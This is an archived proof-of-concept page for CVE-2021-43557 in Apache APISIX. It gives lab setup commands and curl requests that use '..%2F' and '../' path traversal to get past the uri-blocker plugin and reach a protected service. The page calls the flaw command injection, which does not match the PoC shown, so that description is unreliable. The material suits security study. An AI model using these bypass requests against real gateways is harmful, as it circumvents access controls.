支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: e454f8bba6310cc460cc2d89c85a10d81ba82b89

来源
https://github.com/xvnpw/k8s-CVE-2021-43557-poc
关联漏洞
标题:Apache Apisix 命令注入漏洞 (CVE-2021-43557)
Description:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX 存在命令注入漏洞,该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。
Description
PoC for CVE-2021-43557
介绍
# Installation

* install minikube
* install apisix:

```
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
```

* deploy app.yaml: `kubectl apply -f app.yaml`
* deploy routes: `kubectl apply -f routes.yaml`

Optional, if you need to change app images:
* (optional) build docker images:
  * `cd protected-service; docker build -t protected-service:0.0.1 .`
  * `cd public-service; docker build -t public-service:0.0.1 .`
* (optional) push docker images into minikube:
  * `minikube image load protected-service:0.0.1`
  * `minikube image load public-service:0.0.1`

# Exploitation

## Manually

To access public service: 

```kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'```

should return 200

To access protected service:

```kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'```

should return 403

To access protected service bypassing uri-blocker: `kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test'`
To access protected service bypassing uri-blocker: `kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'`

Both should return 200
文件快照

 [4.0K]  /data/pocs/e454f8bba6310cc460cc2d89c85a10d81ba82b89
├── [ 135]  apisix_request.sh
├── [1.2K]  app.yaml
├── [4.0K]  protected-service
│   ├── [ 140]  app.py
│   ├── [ 246]  Dockerfile
│   └── [  12]  requirements.txt
├── [4.0K]  public-service
│   ├── [ 134]  app.py
│   ├── [ 246]  Dockerfile
│   └── [  12]  requirements.txt
├── [1.8K]  README.md
└── [ 912]  routes.yaml

2 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。